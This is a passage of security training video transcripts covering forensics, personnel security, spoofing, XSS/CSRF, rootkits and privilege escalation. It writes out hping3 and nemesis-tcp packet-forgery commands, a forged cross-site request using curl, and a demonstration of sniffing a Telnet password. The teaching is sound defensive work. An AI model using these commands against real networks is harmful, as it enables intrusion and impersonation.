demonstrate how to view deleted files on a hard disk. [The Restoration folder is open in the Windows File
Explorer. It displays files such as DLL16.DLL, DLL32.DLL, file_id.diz, FreePC.rtf, and
Restoration.exe.] Most of us know that when we delete a file it actually just goes into the Recycle Bin, at least on the Windows platform. And, of course, if we empty the Recycle Bin, the file appears to be gone forever. Of course, that's not the case. Files are often still retrievable even if you repartition a disk, let alone just format the file system on that partition. And that's why it's important that we use appropriate disk scrubbing or cleansing tools to wipe the content from the disk. Depending on the industry we're in, there might only be approved tools that we're allowed to use to do that. Here I've downloaded and have available a free file restoration tool for the Windows platform. So I'm going to go ahead and open up this Restoration
program. [The Restoration Version 3.2.13 window opens. It is divided into two sections. The first section
displays many column headers such as name, In Folder, Size, and Modified. The second section displays the
Drives drop-down list box, buttons named Search Deleted Files, Restore by Copying, and Exit. The All or part
of the file textbox is also displayed.] And I'm going to leave it on drive C, and I'll click the Search Deleted
Files. And immediately we can see the number of files that it's found that were removed from the hard disk on
this system. So we can see the name of the file, the folder it was in, the size and the modification date and
timestamp, although the modification column is cut off a little bit currently in the display. But we can widen
that after the fact.
Now we have the choice of selecting either a single file. [The presenter selects a few files by using the Control
and Shift option.] Let's just verify that we can see the modified column. Or we could use Ctrl-click to select
non-adjacent multiple files or even Shift-click for adjacent files. The idea is that we select these files because
we then have the option of clicking the Restore by Copying button at the bottom right. [The Save As dialog
box opens.] And we can determine exactly where it is that we want to restore those entries. Now at the same
time we should also bear in mind there are other tools that we might use to look at deleted files. Here I've got
the EnCase Enterprise tool [He switches to the EnCase Enterprise Edition window. The window includes a
menu bar below which are several buttons for New, Open, Save, and Print. Below the buttons, the window is
divided into three sections. The first section includes nodes such as Cases and subnodes named Case 1 and C.
The second section displays many files in a tabular format. Some of the column headers are name, Filter, In
Report, File Ext, and File Type. The third section is below the first two sections. ] where I've already created a
case file and acquired the contents of drive C, as you can see clearly here. So of course, we can peruse drive C
and see what's there at the point of time that this evidence was acquired. But it's always important to think
about making sure [He right-clicks the C subnode.] that there's no tampering with evidence. Of course, that
means following the chain of custody. One aspect of that is to create a hash. So here in EnCase, I could right-
click on drive C and choose to generate a hash [He selects Hash from the shortcut menu and the Hash window
opens.] for all sectors on this partition, or I could specify a subset. Of course, at the Windows command
line, [He switches to the Windows PowerShell window.] for instance, in PowerShell, we can use the get-
filehash cmdlet, [He refers to the Get-FileHash cmdlet and the hash EDABA50089717400A673F3972DA4D379702FD08A8FA7123749745E6C9BE3C2D6.] given a file name to
result in a hash. Now the idea is that when we generate a hash in the future and compare it to this hash, if
anything's changed, the hash will be different and so we'll know that something has changed. [He switches to
the EnCase Enterprise Edition window.] And the same thing is true here in the EnCase tool. [He switches to
the Disk Scrubber v3.4 window.] There are plenty of tools available for scrubbing or wiping disks. [The Disk
Scrubber v3.4 window includes the Drive to Scrub drop-down list box which displays the options available.
The window also includes the Priority drop-down list box and adjacent to it is the Scrub Drive button. Radio
buttons for the options Normal (Random Pattern Only), Heavy (3-Stage Pattern, 0s+Rnd), Super (5-Stage, 0s+1s+Chk1+Chk0+Rnd), and Ultra (DoD recommended spec w/Vfy) are displayed.] Here I'm looking
at the Disk Scrubber tool where we can choose the disk that we want to sanitize, essentially. We can scrub it
and we can also determine exactly how that's going to happen where we can have multistage overwrites of
randomized data. Now this way, if a disk is wiped in a thorough manner, it makes it much more difficult for
anyone to acquire any data remnants in the future. In this video we discussed how to view deleted files on a
hard disk.
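For reference, hashing an acquired file in PowerShell, as shown above, looks something like the following. This is a minimal sketch; the evidence file path is a hypothetical placeholder.

# compute a SHA-256 hash of an acquired evidence file (the path is hypothetical)
Get-FileHash -Algorithm SHA256 C:\Evidence\driveC_image.E01

# re-running the same command later and comparing the output shows whether the file has changed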
[Topic: Hiring and Background Checks. The presenter is Dan Lachance.] Taking the time up front to be very
careful about which employees get hired in a company can pay dividends over the long term. In this video,
we'll talk about Hiring and Background Checks. The first core item that we must consider is, how qualified an
individual is for a given job role. Do they have the correct skill sets? Are they suitable in terms of their
personality for what's expected of them and are they trustworthy? Job descriptions then, must be detailed and
well-written to attract the appropriate candidates. Also, certain positions might have access to classified data or
sensitive information. And as such, it might be especially important to conduct a thorough background check
for this type of position. Competencies for potential employees might require that teamwork, leadership, and a proven track record of ethical behavior be demonstrated within the job role. There are also different types of reference checks for potential employees, like personal references that might be able to attest to the character of the individual. Work references, of course, lend a lot of insight into the past work history of an individual. A
thorough background check could uncover additional information not disclosed by the potential employee. We
can use this thorough background check result and information perhaps to make a decision about hiring,
because it might be related to minimizing future lawsuits, or even to identify falsifications perpetrated by the potential employee related to things like their work history, their past job roles and duties, and their reasons for leaving jobs. It might also bring to light a past criminal history.
The benefits of thorough background checks, even though they might cost more and take more time up front, include an overall reduced hiring cost, protection against potential lawsuits, lower employee turnover, and the identification of criminal activity. So over the long term, what we're doing is being very selective of who gets
hired to ensure the best possible candidate is filling a job role. Other things that might be done with
background checks and employee hiring include polygraph tests, or drug tests, or even personality testing.
There's also the timing that we must think about, in terms of the support required and the items that should be done prior to hiring, such as completing a background check for criminal activity. And even once people are hired, it's important that we periodically re-investigate some of these aspects. This might include periodic drug testing of employees. Then there's also the financial side of things,
such as conducting a credit check by looking at the credit history of either potential new employees or even
existing employees. The reason this can be important is because people in desperate financial situations will
sometimes resort to desperate attempts to get money, perhaps to pay off lenders. And so over time we might be
able to shed light on this actually happening in the organization where people that have access to customer
credit card numbers might actually be using them fraudulently. Driving records might also be very important, certainly if the job position involves driving for company business. You might also want to validate social
security numbers to make sure that they actually exist. You might also want to have a cross reference check
against a terror watch list for potential employees. In this video, we discussed Hiring and Background Checks.
[Topic: User Onboarding and Offboarding. The presenter is Dan Lachance.] Most organizations have a
specific hiring and termination set of procedures for users. And in this video, we'll take a look at user
onboarding and offboarding. With user onboarding, there's often an employment agreement and acceptable use
policies that the user must sign off on, prior to starting employment. These documents often include company
rules and restrictions, and will include various security policies and acceptable use policies, for example, email
and VPN acceptable use. It will certainly include a job description of what is expected of the user. And any
violation consequences that might be taken into consideration when any rules are broken. Of course, the
employment agreement will also detail whether it's a term or a permanent position, or detail things like the
length of employment. In some cases, a non-disclosure agreement, or NDA, must be signed by the new
employee, to protect confidential information. Such as trade secrets, proprietary company information, or, if
the user is dealing with legal contracts, they'll often have to sign an NDA related to that. So essentially an
NDA, or non-disclosure agreement, is an agreement to not disclose sensitive information. Violations could
result in strict penalties, including being terminated. User onboarding often includes the creation of a new user
account and group membership, to give access to specific resources. It might also include the issuance of
various access cards to access a parkade, or a building, or even a certain floor in a building.
User training is often conducted so that users are aware of how procedures are run within the organization, and
also should include security training. With user offboarding, often many companies will conduct an exit
interview, to determine what the user thought of their experience and what might need to be improved. User
offboarding also means environment security, which includes things about physical aspects of what the user
was doing in the company, such as their workspace and any equipment that they physically had access to. User
offboarding must also stipulate what would be done with disgruntled employees that need to be removed from
the premises. Often, this means they need to be escorted by security personnel. Employee temperament also
plays a part in user offboarding, where some disgruntled employees might become belligerent or violent. So
terminations, then, need to be planned ahead of time within the organization. There should be a specific
defined procedure that is known by HR and other related individuals.
This could also be something that's done in a private setting, such as within a single office, or even within a specific department within the organization. So documents need to be prepared that define how terminations should occur. And the idea is to reduce any negative incidents, including data leakage, when users are
offboarded. Employee equipment includes things like mobile devices, such as smartphones and tablets,
laptops, vehicles, and so on. So it's important that this equipment be returned and properly sanitized if needed.
There's also the computer account of a user, any email or VPN accounts that they were given access to, that
would either have to be suspended or disabled, or removed according to company policy. HR, of course, must
take into account the final paycheck that is owed to the employee. Security must be notified in terms of IT
security, and also physical security personnel, that a user is leaving the company. Often a witness is required
when a user is being terminated, that could be a manager or a security official within the organization. It's also
important to obtain any ID or badges or keys that were issued to the employee upon hiring. Once terminated,
the user might be escorted off premises and told that they're not allowed to return. In this video, we discussed
user onboarding and offboarding.
[Topic: Personnel Management Best Practices. The presenter is Dan Lachance.] In this video we'll talk about
Personnel Management Best Practices. For users within the organization there needs to be ongoing
supervision. There should be periodic performance reviews so that we can compensate well-performing users, or recognize them for their contributions to the organization. Performance reviews can also be used to develop
skill sets for employees in terms of future ambitions for acquiring certain certifications or other job roles
within the company. The performance review can also define the training requirements in order for a user to
reach those goals. Performance reviews can also shed light on the overall morale of users within the company.
Job rotation is used to reduce the risk of collusion by placing people in different jobs on a periodic basis. Any
fraudulent or unauthorized activity could come to light when a new user takes on a job role handled by another
user previously. Separation of duties ensures that one employee isn't solely responsible for all of the parts of a
business process, from beginning to end. Succession planning is also important to ensure that we always have
additional candidates that are suitable for a job role for a user that might leave the organization, or might, for
example, retire within a period of time.
Dual control requires at least two people to be involved with a specific business process. The idea here is that
we reduce the possibility of fraudulent activity. Although we aren't eliminating the possibility of collusion
between those two or more persons. Cross training allows us to make sure that all of our eggs aren't in one
basket. So that we're not dependent upon a single employee to perform a special job role, especially if it's
crucial to business operations. The principle of least privilege states that we should grant only the required
permissions for a user to perform a job role and nothing more. Periodically, we can check that this is being
adhered to through various audits. Mandatory vacations not only ensure that employees are refreshed, well rested, and ready to come back to work and be productive. They also allow the identification of abnormalities in their job roles while someone else fills in for them during the vacation. In this video,
we discussed Personnel Management Best Practices.
[Topic: Threats, Vulnerabilities, and Exploits. The presenter is Dan Lachance.] In this video we'll talk about
Threats, Vulnerabilities and Exploits. The first thing to say is that the terms are often confused. So the
distinction between Threats, Vulnerabilities and Exploits is very important for a number of reasons. Such as
when we take a look at documentation that refers to these terms, or in the crafting or use of organizational
security policies. It's important to understand that when we talk about security the weakest link in a chain
essentially defines your security posture, so it's important that we identify those weak links and do something
about them. With a threat we need to have an inventory of assets that need to be protected against those threats.
So an asset inventory then allows us to perform a threat analysis against those assets. We can then determine
what kind of negative impact against an asset might be realized. So essentially this is an impact analysis.
Assets and threats need to be prioritized so that energy and resources can be allocated accordingly. A
vulnerability is a weakness. It could apply at the hardware level where we're running out of date firmware for
instance on a wireless router that has known vulnerabilities, or it could be the lack of physical security controls. Maybe servers aren't behind a locked door. At the software level, a vulnerability could remain exposed until software updates are applied. Often software updates address this type of issue. But sometimes a software misconfiguration can present a vulnerability that can be exploited by a malicious user. In some cases, even sticking with the default settings in some software can mean that we've got vulnerabilities.
An exploit takes advantage of a vulnerability or weakness. Now this can be done legitimately when we
conduct penetration testing to identify these vulnerabilities that actually can be exploited because then we can
mitigate them in some way. But at the same time malicious users might exploit a known vulnerability if we
haven't put a security control in place to mitigate that vulnerability. Zero-day exploits are those that are not known by vendors or the general IT security community. However, they are known by one or more malicious users who can take advantage of them. In some cases zero-day exploits might be indirectly detected with some
kind of intrusion detection or prevention system. Because it's really looking for suspicious activity out of the
norm, which could indicate a zero-day attack of some kind. An example of a threat would be the loss of data
availability. Now that could be for numerous reasons because a server has crashed or because files have been
locked due to ransomware. A vulnerability might be the lack of user awareness and training, which might lead to something like ransomware where the user opens up an email and a file attachment that they didn't ask for or weren't expecting. The exploit of course would trick the user somehow into opening something like
a file attachment that would spawn ransomware. In this video, we discussed threats, vulnerabilities, and
exploits.
[Topic: Spoofing. The presenter is Dan Lachance.] Forgery has been around for a long time. Whether it's in
the form of a forged signature, a fake passport, or even counterfeit money. In this video, let's talk about
spoofing. Spoofing is forgery, and in the digital IT world, there are many different types of spoofing attacks to
fake an identity. This includes MAC address spoofing, which might be used by malicious users so that they
can make a connection to a wireless access point that uses MAC address filtering. IP address spoofing might
be used to defeat basic packet filtering rules that are simply based on a source network range or IP address.
DNS spoofing is often called DNS cache poisoning. Essentially, an attacker can compromise either the local hosts file on a device or a DNS server, so that when a user attempts to connect to a friendly name, they're instead redirected, unknowingly, to a fraudulent website, for example, that looks like the legitimate website. Email
spoofing is an email message that appears to come from a valid email address, where the email address was
actually completely faked.
And this is possible in some mail systems. Man-in-the-middle attacks are used to interrupt communication
between two parties by forging the identity of one of the parties and knocking that party offline. Now this
would be unknown to the other end of the communication. Session hijacking has many different attack types,
including IP spoofing. Now, with a man-in-the-middle attack, we are essentially interrupting the communication between two parties. There are many ways that this can be perpetrated, including through SSO, or simply through IP spoofing. SYN scanning can also be combined with spoofing. With SYN scanning, the malicious user attempts to set up a TCP connection with a host at different port numbers. Now, this is done by sending a synchronization, or SYN, packet. And often, this is done to attempt to fake the initiation of a three-way handshake to different services running on a server.
There are many freely available tools that can be used to spoof packets. So, for example, pictured on the screen
we're seeing the use of the nemesis-tcp tool. [Dan explains the following line on screen: nemesis-tcp -v -S
200.1.1.1 -D 56.37.87.98 -P /fakepayload.txt] Where -v turns on verbose screen output. -S specifies the source
that we want this to appear to have come from. -D is the destination we're sending this traffic to. And -P
specifies the location of a payload file, where we could determine whatever we want to be seen in this
transmission from a simple text file. So as you can see, it's very easy to forge an entire TCP packet. Any
network intrusion detection or prevention tools, even host intrusion detection and prevention tools that might
look at packets, would probably not be able to identify that this is forged. Unless you're using some kind of encryption and digital signing at the packet level, it's pretty hard to determine whether what you're looking at on the network has been forged or not. In this video, we discussed spoofing.
[Topic: Packet Forgery using Kali Linux. The presenter is Dan Lachance.] Spoofing means forgery. In this
video, I'll demonstrate how to forge packets or how to spoof packets using tools available in Kali Linux. [The
root@kali:~ command prompt window is open. The following command is displayed on screen: cat
fakepayload.txt. The output is as follows: This is fake data used in a spoofed packet.] There are plenty of tools
out there for different platforms, including Windows, where you can create your own packets completely,
entirely, including the payload and all header fields and then send it out on the network. Whether it's a wired or
wireless network. So here in Kali Linux, I've created a file called fakepayload.txt and I've catted it here using
the cat command so we can see what's in it. It simply says this is fake data used in a spoofed packet. What
we're going to do here is we're going to use the hping3 command to forge or create a fake TCP packet. So I'm
going to type hping3, that's the command. What I want to do is send this to a target at 192.168.1.1. So I'm
going to be placing a packet or packets out in the network. That's where they're going. That's the destination.
Now I'm going to use --spoof. And I want it to look like it's coming from a host at 4.5.6.7. So I'm forging that
or really I'm spoofing that. The next thing I want to do is give it a TTL, let's say of 31. The TTL value in the IP
header field is decremented each time a packet goes through a router.
And so different operating systems start off with different TTL values like 127 or 255, 128 and so on. So this
is going to indicate then that the packet appears to not have originated on the local subnet even though it
actually has. I'm going to give it a --baseport of 44444. In other words, this is a high-numbered source port, for example, from a client. And the --destport, destination port, let's say is port 80. So it looks like it's going to port 80 and, because this is a transmission from a client, the source is a high-numbered port. And finally, I'll use -E and I'll
tell it I want to use my fakepayload.txt file. And I'll just make sure that I put in -d 150, to make sure I'm telling
it a size that can accommodate what's in my fake payload. Now, before I press Enter, I'm going to start a
Wireshark packet capturing session. Like Kali Linux, Wireshark is another free tool that you can download
and use. [The Wireshark Network Analyzer Window is open. Running along the top is a menu bar with various
menus such as File, Edit, View, and so on. Below that is a toolbar with several icons such as save, refresh, and
so on. Below that is a Filter field with the following entry: ip.dst==192.168.1.1. Next to this field is a drop-
down icon and three options, which are Expression, Clear, and Apply. The rest of the window is divided into
four sections, which are Capture, Files, Online, and Capture Help.] So here in Wireshark, I'll click the
leftmost icon [from the toolbar] to begin a packet capture. [The Wireshark: Capture Interfaces dialog box
opens. It lists various network interfaces with IP addresses. There are three buttons at the end of each line,
namely Start, Options, and Details. There are also two buttons at the bottom of the dialog box, namely Help
and Close.] I'm going to select the appropriate network interface here, where I've got traffic on my machine
and I'll click Start. [Dan clicks the start button corresponding to IP address 192.168.1.157.]
And at this point, it's capturing network traffic. [The Capturing from Microsoft - Wireshark page opens in the
window.] I've already got a filter here where the IP destination equals 192.168.1.1. Notice nothing is listed
because we haven't yet injected our fake packet. All right, [The screen switches to root@kali:~ command
prompt window.] so now that we're capturing network traffic, let's go ahead and send out our fake traffic. So
I'm going to press Enter back here. [Dan executes the hping3 command that he had previously typed.] Even
though I've got a message saying operation not supported, can't disable memory paging, it's all good. It is
continuously transmitting those forged packets. Now, if we switch over to Wireshark we're going to see just
that. Notice here in WireShark, [He switches back to the Wireshark window.] we have what appears to be
traffic coming from 4.5.6.7, destined for 192.168.1.1 and it keeps going. Let's stop the capture with the fourth
icon from the left [on the toolbar] and let's just click on one of these. [He selects one of the packets.] So, if we
were to examine the ethernet header, well, we've just got some MAC address information. And we certainly
could have spoofed the MAC address, although we didn't in our case. Here in the IP header, notice that we've
got interesting things, like the TTL, the Time to Live is actually set to a value of 31. And the source and
destination IP addresses are as per what we instructed.
And if we go a little bit deeper, you can see down here in the text portion of the payload, it says this is fake
data used in a spoofed packet. So clearly, the message here is that it's very easy to craft or create forged traffic
and put it out on a network. Now, there are many intrusion detection and prevention systems. Even if you're
just generally periodically capturing network traffic, you need to take it with a grain of salt. Just because you
see a specific piece of traffic on the network, it doesn't mean it actually is legitimate and originated from where
it appears to have originated. In this video, we learned how to forge packets using Kali Linux.
Upon completion of this video, you will be able to recognize how impersonation can be used to gain
unauthorized access.
Objectives
[Topic: Impersonation. The presenter is Dan Lachance.] In this video, I'll talk about Impersonation. One form
of impersonation is social engineering, where a malicious user might pose as someone from the help desk,
asking a user for their current password, which is required for a password reset. Now this might happen over
the telephone, or it might come through a spoofed email message. In the same way, a malicious user could
pose as a telecom provider to gain physical access to a wiring closet. Or, they could pose as a banker or a bank
that a user does banking with in order to gain access to their specific account details. And again, that could
happen over the phone or most often, through an email message with a link to a fraudulent site. At the user
level, impersonation can take the form of a user connection to a web app, in other words, a session. At the
device level, we could be using a device to establish a VPN session. And that connection possibly could be
impersonated. But in order for this type of impersonation to take place in a web application session or VPN
session, a lot of things have to go right for the attacker. This is where a man-in-the-middle attack comes in,
which is often called an MitM. This is a real time exploit where we originally have two communicating parties
that are both legitimate. However, we have an attacker in the middle. Now, both parties will assume that they
are communicating directly.
They don't know that there's someone in the middle that's capturing the conversation and perhaps even
modifying messages before they're relayed to the other party. Although, with a man-in-the-middle attack, the messages don't necessarily have to be modified, but they are being caught or viewed and then relayed off to the other party. So in some cases when that data is altered, it means that the man-in-the-middle attacker has the
ability to do things like alter the course of a banking transaction, and so on. Man-in-the-middle SSL or TLS attacks mean that a compromised system might be configured to trust certificates from any authority. Now,
today's devices, including smartphones, have a certificate store where they have a number of trusted root
certificates. Now these trusted root certificates are used when the device connects to, for example, a VPN that uses certificates or an HTTPS website. The device will look at the signer of the certificate presented by, say, that HTTPS website, to see if it trusts the signer. Now the problem is that most of today's devices have way too
many trusted root certificates. And as a matter of fact, if any of them are compromised, so are all of their
certificates, potentially. So, when an attacker potentially compromises a system, what he or she could do, is
install a trusted root certificate authority under their control.
Now, what this means then, is that a client that would connect to a protected HTTPS web server, for instance,
would then trust that signer. And therefore, the user wouldn't get a warning that the site shouldn't be trusted.
Now, clients don't normally require a PKI certificate in this kind of example, but servers do. Another aspect to
consider with impersonation is a compromised private key. When we talk about a PKI digital security
certificate, we are also implying that there is a public and private key pair that is unique and issued to a user, a
device, or an application. Well, if the private key is compromised somehow by a malicious user, then that
malicious user can essentially act, or do things on behalf of the owner of that private key. They can digitally
sign messages. Or they could decrypt messages that were intended to only be decrypted by the owner of the
private key. One way that a private key can be compromised is by brute force guessing. So, for instance, if a user exports their private key to a file, uses an easy-to-guess password, and perhaps stores that on a USB thumb drive which is lost or stolen, it's possible that it could be compromised simply by guessing
passwords. Impersonation also deals with session hijacking, essentially taking over a previously established session. And this is part of what can happen with a man-in-the-middle attack. There are various types of
session hijacking examples related to varying protocols like HTTP and FTP. However, in some cases, the
original legitimate station that is being taken over, essentially, in the communication, may be taken offline by
the attacker. So what are some countermeasures then for man-in-the-middle attacks and session hijacking?
Some of them are common fare, such as hardening devices, using dedicated servers for network services where
we don't collocate other network services on the same host. We might also consider using both network and host firewalls, at both levels, to control inbound and outbound traffic.
The use of intrusion detection and prevention systems, or IDS and IPS systems, is highly recommended to
detect suspicious activity. We should also consider trimming down the list of trusted certificate authorities on
all devices. Otherwise, we really have an increased attack surface that really isn't necessary in most cases. As
always, user awareness and training of this possible security vulnerability is always important. We should also
make sure that we don't rely solely on IP address blocking, or even MAC address blocking for that matter. When it comes to our security countermeasures, these are good as one layer, but they shouldn't be the only control in place because addresses are easily spoofed with freely available tools. In this video, we talked about
Impersonation.
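One practical starting point for trimming the list of trusted certificate authorities is simply enumerating what's in the root store. The following is a minimal sketch, assuming a Windows host with PowerShell; the store contents will differ per system.

# list the machine-wide trusted root certification authorities
Get-ChildItem Cert:\LocalMachine\Root | Select-Object Subject, NotAfter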
[Topic: Cross-site Scripting. The presenter is Dan Lachance.] There are many crafty ways that malicious
users can force the execution of malicious code on machines. In this video, we'll discuss cross-site scripting. A
cross-site scripting attack begins in step 1, with an attacker injecting some kind of script code into a trusted
web site. Now this normally happens, for instance, through a field on a web form that isn't properly validated.
In other words, it might allow the user to input anything before the data gets saved and uploaded to the server.
Now usually what the attacker is doing is they are injecting their malicious code into server side scripts. In step
2, an unsuspecting user of that same site then executes the script. In step 3, the script is now running on the
unsuspecting user's computer locally in their browser. And could potentially access their cookies in their web
browser or other session details. Most modern web browsers are sandboxed, which means that anything running in the context of that web app will not affect anything outside of that web application. It can't talk to the operating system kernel and so on. But it depends on the version of the web browser in use on the client device and how it's configured.
Cross-site scripting is often simply referred to as XSS. So what can we do about it? Well, some
countermeasures include filtering inputs. So we want to make sure that developers are following secure coding
guidelines. And that they are carefully validating every field on a web form, or even validating URL strings
sent to a server to be parsed, to make sure that only acceptable data exists. As always, user awareness training
is also very crucial. So that if a user notices some kind of suspicious activity or behavior in their browser, they
should generally be aware that maybe something is up, there could be some kind of a cross-site scripting attack
taking place. In other cases, cross-site scripting attacks execute code on a client machine in the background
where there may not be any visual indicator, at least at the time of the attack. Another type of attack is a cross-
site request forgery, which is often referred to as a CSRF. In this type of attack, code gets executed for a user
that's already authenticated to a web service. Now that code is executed by an attacker, not by the user. The
user doesn't know about it. So one way this could happen is for an attacker to compromise a user's system and then have the ability to send a user authentication token that's been modified by the attacker to the web app.
Now this can be done by the attacker making changes to, or perhaps, modifying and sending off a web browser
cookie to a web app that already trusts that there is an established session in place. So the attacker then could
transmit instructions to the server without user consent. This could also take the form of a URL that the user is
tricked into clicking on. Maybe to transfer funds to a different account at a different banking institution and so
on. There are countermeasures that we can apply here to mitigate the effect of cross-site request forgeries. First
of all, the web application, server side, can ensure that requests came from the original session. There are many techniques that developers would usually put in place, following secure coding guidelines, to make this happen.
Now, one would be to check the origin header in the HTTP request to make sure that it's valid and matches the
site. Or to use some kind of a challenge token that's unique to each session. Or to use some kind of a
randomized hidden cookie value that gets checked every time the cookie is sent to the server. Users, of course,
should not leave authenticated sessions open. So, for example, if a user is working with their email online or
working with online banking, as soon as they're finished with it, they should log out and not wait for the time
out to occur. At the same time, users should never save passwords for web applications. In this video, we
talked about cross-site scripting.
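To picture the Origin header check described above, consider a forged request sent from outside the application. This is a minimal sketch using curl; the URLs, cookie value, and form fields are all hypothetical.

# a cross-site request: the Origin header names a site other than the application itself
curl -X POST https://app.example.com/transfer \
  -H "Origin: https://evil.example.net" \
  -H "Cookie: session=abc123" \
  -d "to=attacker&amount=1000"
# a server that validates Origin against its own host name, or that checks a per-session
# anti-CSRF token in the request body, would reject this request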
[Topic: Root Kits. The presenter is Dan Lachance.] In this video I'll talk about root kits. A root kit is a form of malware and it can apply to the Windows platform or the Unix or Linux platform, including at the smartphone level. It's usually delivered through a Trojan. A Trojan appears to be something useful or benign, like free downloadable software. However, in fact it is used as a vehicle to transport malware. So a root kit then creates a backdoor. A backdoor allows an intruder to keep elevated
access to a system or an application without detection. This can be done in many ways including by replacing
operating system files that allow and hide intruder access. For example, consider a root kit that replaces the
netstat command on the Windows and Linux platforms. The netstat command is usually used by administrators
to view any connections that are made to a machine on a given port or outbound connections made to other
machines on a given port. By replacing the netstat command, an attacker can hide the fact that they've got
some kind of a listener. Or that they've got some kind of a process that periodically reaches out to receive
instructions from some control center owned by a malicious user.
Kernel root kits exploit operating system kernels and their ability to be modular and expandable. Because if we
allow access to the operating system kernel, we are allowing access to everything. And, in many cases, things
like drivers are given operating system kernel ability. So even installing a driver could be a form of malware
that could infect a system and install a root kit. Now a root kit could also replace many files. It's not as if it has
to replace a single file. So in the case of hiding listening network sockets, as per our netstat example, we have to know what a socket is. A socket is a combination of a protocol plus a host and a port, such as http:// followed by a host name, a colon, and then a port number. Other kernel root kits will actually hide files that aren't seen with normal
operating system commands. These files might contain illegal data or they might contain additional malware
payloads. Now we could also have running processes that are hidden from normal operating system tools like
the Windows Task Manager or the Linux ps command. There's also the possibility of kernel root kits being
spawned due to some hidden configuration somewhere such as in the Windows registry or within a Unix or
Linux configuration or .conf file. Now bear in mind, in order for a kernel root kit to be installed in the first
place, at some level the machine has to be compromised. Countermeasures to root kits include hardening the
network as well as hosts on the network.
And of course running up-to-date antimalware that might detect a root kit. There are also specific anti-rootkit
tools available from various vendors. Examples include the Malwarebytes Anti-Rootkit, or the McAfee
RootkitRemover. The use of intrusion detection and prevention systems is also really important in this case to
detect suspicious activities such as the replacement of operating system files. In the Windows world, user
account control, or UAC, can also be beneficial in that it can prompt the user of the system before anything
happens in the background, such as making a change to the registry to spawn some kind of a root kit. Also, on the Unix and Linux platforms, we might consider disabling Loadable Kernel Modules, or LKMs. In other words, for what's required for the kernel to function properly, things like IPv6, which may be turned on or off in the kernel, or additional drivers, we might want to make sure that they are compiled directly into the Linux kernel where possible. In this example, [The Malwarebytes Anti-Rootkit BETA v1.09.3.1001
wizard is open. The wizard is divided into two parts. The first part is titled Overview, and it contains four
options that are Introduction, Update, Scan System, and Cleanup. The Scan System option is selected by
default. The second part displays the contents of the option selected in the first part. This part displays a Scan
Progress section, which contains three checkboxes, namely Drivers, Sectors, and System. It also has a Scan
button. At the bottom of the wizard are two buttons, Previous and Next.] you can see the Malwarebytes Anti-
Rootkit tool that's been installed on this system. Where down below, the scan targets that it will look at include
drivers, sectors on the disk, as well as the entire system. So I'm going to leave them all checked on and I'm
going to go ahead and click the Scan button. In this video we talked about root kits.
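Beyond dedicated anti-rootkit scanners, package managers can verify that operating system binaries such as netstat haven't been replaced. A minimal sketch, assuming a Debian/Ubuntu host (debsums may need to be installed) or an RPM-based host respectively:

# Debian/Ubuntu: report changed files in the package that provides netstat
debsums -c net-tools

# RPM-based distributions: verify sizes, permissions, and digests for the same package
rpm -V net-tools

# list loaded kernel modules; unexpected entries warrant a closer look
lsmod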
After completing this video, you will be able to explain the concept of privilege escalation.
Objectives
[Topic: Privilege Escalation. The presenter is Dan Lachance.] In this video, I'll talk about privilege escalation.
Privilege escalation allows the unintended granting of privileges to unauthorized parties. There are many types
of attacks that can result in privilege escalation, such as social engineering, to trick someone into divulging
things like credentials. Or packet sniffing tools, which can capture network traffic to reveal vulnerable items,
such as clear text passwords. Consider the example of using WireShark to capture network traffic, which we
see the result of here on screen. [The Telnet from Windows to BSD.pcapng page is open in Wireshark
window.] I'm going to filter this packet capture for Telnet traffic. Telnet is often used to remotely administer a
device. [Dan types telnet in the Filter field.] Like a switch or a router or even an operating system. However,
the problem with Telnet is nothing is encrypted. We really should be using SSH instead. So let's filter this
packet capture for Telnet. We can see we have a number of Telnet packets here. So I'll now go to the Analyze
menu. And I'll choose Follow TCP Stream. [from the drop-down.] And immediately we can see that the
password for user student has a value of chicago. [The Follow TCP Stream window opens.] So this is one way
where we could elevate privileges for the target where this set of credentials was used.
And now we have a way to get into that device. Other attack types include buffer overflows, where data goes
beyond allocated memory, for example, for a variable for a field on a form. So often, developers can ensure
that this doesn't happen, by making sure that their code never allocates more memory than is needed to
accommodate specific data types. Also, privilege escalation might result from a compromised system, where
an attacker has installed a rootkit. Or brute-forcing credentials for a privileged account could reveal the
password. Reconnaissance also can reveal things like service accounts that don't have any passwords, that an
attacker might take advantage of. Privilege escalation begins with a malicious user learning of systems through
reconnaissance techniques. That might include a ping sweep to get a list of hosts that are up on a network, but
they have to be on the network in the first place to do that. The next thing would be that the malicious user
would learn as much as possible about the systems that are up and running.
This can be done through enumerating ports, services, user accounts, and anything else that responds, using
freely available tools. This could lead to the attacker being able to compromise an unprivileged user account,
which they could then log in with to learn more. Eventually they might be able to compromise a privileged
user account. Which would allow them to do things like installing a rootkit to ensure that they have continued
future access through a hidden mechanism. Of course, attackers will then hide traces of the compromise,
perhaps by modifying log entries. What can we do about privilege escalation type of attacks? Well, hardening
is always something that is an option. We can apply firmware and software updates to all devices. We can
make sure that we are aware of software flaws, so that we can put controls in place to mitigate them. So for
example, if we absolutely must use insecure protocols like Telnet or FTP, maybe using them through a VPN
tunnel would be an acceptable mitigation. We should also be aware of configuration flaws. So depending on
how a tool or a piece of software is configured, it could lead to a vulnerability. In this video, we talked about
privilege escalation.
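The same credential exposure can be spotted without the GUI by using tshark, Wireshark's command-line counterpart. This is a minimal sketch; the capture file name is a hypothetical placeholder.

# show only Telnet packets from a saved capture
tshark -r capture.pcapng -Y telnet

# reassemble the first TCP stream, similar to Follow TCP Stream in the GUI
tshark -q -r capture.pcapng -z follow,tcp,ascii,0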
In this video, learn how to distinguish between common exploit tools.
Objectives
[Topic: Common Exploit Tools. The presenter is Dan Lachance.] In this video, we'll talk about Common
Exploit Tools. The first thing to consider is the fact that tools themselves are not malicious. Rather, it's how the
tools are used that can be malicious. There are plenty of freely available tools that can be used legitimately by
IT technicians to test the strength of their networks and hosts on those networks. But in the wrong hands those
same tools could be used to exploit vulnerabilities for purposes that are nefarious. Common Exploit Tools are
available for all platforms. So, Windows based as well as Unix and Linux based. In some cases some of the
exploit tools can even run on a mobile device. Some of the tools are for free and other tools are not. Some
common examples of tools include dsniff. dsniff is a suite of tools that are used for network auditing and
penetration testing, with a focus on trying to sniff out network passwords. Webmitm stands for web man-in-the-middle.
This is both a packet sniffing tool as well as a transparent proxy that can relay messages to another party, both
of which are required for a man in the middle attack. Nemesis is a packet creation and injection tool that allows
us to quickly and easily spoof any type of network packet. In Aircrack-ng, the ng stands for next generation, and it allows us to crack Wi-Fi WEP, WPA, and WPA2 keys. Nessus is a widely used vulnerability scanner that will be able
